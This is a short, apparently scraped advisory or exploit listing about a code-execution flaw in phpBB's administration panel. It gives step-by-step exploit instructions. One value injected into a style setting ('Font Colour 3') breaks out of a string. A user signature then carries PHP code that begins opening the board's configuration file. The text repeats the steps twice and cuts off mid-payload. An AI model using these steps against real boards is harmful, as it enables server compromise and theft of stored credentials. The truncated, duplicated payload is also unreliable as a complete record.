On a phpBB board, a user having access to the admin panel is able to execute PHP code:
This example will execute $user_sig as PHP code:
Go to Administration Panel > Styles Admin > Management > subSilver > Edit
Set "Font Colour 3" to "'./*"
Profile
Set Signature to "$fd=fopen($phpbb_root_path.'conf...
This example will execute $user_sig as PHP code:
Go to Administration Panel > Styles Admin > Management > subSilver > Edit
Set "Font Colour 3" to "'./*"
Profile
Set Signature to "$fd=fopen($phpbb_root_path.'conf...
[ more ]